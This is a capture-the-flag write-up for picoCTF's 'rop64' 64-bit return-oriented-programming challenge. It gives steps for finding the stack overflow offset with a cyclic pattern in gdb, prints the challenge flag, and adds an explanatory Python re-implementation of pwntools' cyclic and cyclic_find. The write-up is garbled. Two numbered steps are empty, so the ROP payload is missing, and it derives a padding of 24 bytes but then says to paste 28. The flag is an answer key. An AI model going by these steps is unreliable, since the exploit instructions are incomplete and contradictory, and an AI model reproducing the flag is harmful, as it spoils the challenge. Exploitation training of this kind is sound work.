rop64
Time for the classic ROP in 64-bit. Can you exploit this program to get a flag? You can find the program in /problems/rop64_0_4c66bec7dba72276ffa01e0ad2d6ec8f on the shell server. Source.

1. Get Padding
   1. Run `python2 -c "from pwn import *; print cyclic(1000, n=8)" > fuzz.in`
   2. Start the program in gdb (preferably with the pwndbg extension), run `r < fuzz.in` to start it, then `x $rbp` to get `0x6161616161616163: Cannot access memory at address 0x6161616161616163`
   3. Run `python2 -c "from pwn import *; print cyclic_find(0x6161616161616163, n=8)"` to get a padding of 16
   4. Add 8 to the padding because right after 16 is the "saved frame/base pointer" (which is 8 bytes because this is a 64-bit program) and we want to modify the "saved return address", which is the next address on the stack. (More Info)
   5. So the padding is `'a'*(16+8)`
2.
3. Paste in a padding of `'a'*28`
4.
5. Run `cat flag.txt` in the shell that spawns

picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}
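To make the "Get Padding" step less of a black box, here is an added, self-contained re-implementation of what pwntools' `cyclic` and `cyclic_find` compute (this is example code written for this page, not the writeup author's script and not pwntools itself). It assumes pwntools' default lowercase alphabet and its de Bruijn sequence construction; the `return_address_offset` helper is a hypothetical name added here to spell out the "+8 for the saved RBP" arithmetic from step 4. The point it shows: every 8-byte window of the pattern is unique, so the value the debugger reports in `$rbp` maps back to exactly one offset, and the saved return address is one 8-byte slot past that.

```python
"""Educational re-implementation of pwntools' cyclic() / cyclic_find()
to show where the padding values 16 and 16+8 in the writeup come from."""
from itertools import islice
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # pwntools' default alphabet


def de_bruijn(alphabet=ALPHABET, n=8):
    """Yield the bytes of a de Bruijn sequence B(k, n).

    Every length-n window of the stream is unique, so a window read back
    from a crashed register pinpoints the offset it was copied from.
    Standard recursive construction (the same one pwntools uses)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=8):
    """First `length` bytes of the pattern; what cyclic(1000, n=8) wrote to fuzz.in."""
    return bytes(islice(de_bruijn(n=n), length))


def cyclic_find(subseq, n=8, max_len=1_000_000):
    """Offset of `subseq` in the pattern, or -1 if not found within max_len bytes.

    An integer is interpreted as the little-endian register value shown by
    the debugger, exactly as pwntools does: 0x6161616161616163 is the
    bytes b"caaaaaaa" in memory order."""
    if isinstance(subseq, int):
        subseq = struct.pack("<Q", subseq)[:n]
    if len(subseq) != n:
        raise ValueError("subsequence must be exactly n bytes long")
    window = bytearray()
    for i, byte in enumerate(islice(de_bruijn(n=n), max_len)):
        window.append(byte)
        if len(window) > n:
            del window[0]
        if len(window) == n and window == subseq:
            return i - n + 1  # index of the window's first byte
    return -1


def return_address_offset(crash_value, n=8):
    """Hypothetical helper (added here) for step 4 of the writeup.

    cyclic_find() on the value found in $rbp gives the offset of the saved
    frame pointer; on x86-64 the saved return address is the next 8-byte
    slot up the stack, hence the +8."""
    return cyclic_find(crash_value, n=n) + 8


if __name__ == "__main__":
    print(cyclic(1000, n=8)[:24])                 # b'aaaaaaaabaaaaaaacaaaaaaa'
    print(cyclic_find(0x6161616161616163, n=8))  # 16
    print(return_address_offset(0x6161616161616163))  # 24
```

Reading the output side by side with the writeup: bytes 16..23 of the pattern are `caaaaaaa`, which is `0x6161616161616163` when loaded little-endian into a register, so `cyclic_find` returns 16 for the saved RBP and the return address lands at 24. The same offset arithmetic is what a crash-triage tool does when it classifies a stack overflow as return-address-controlling, which is why a de Bruijn pattern rather than a run of `A`s is used for the probe.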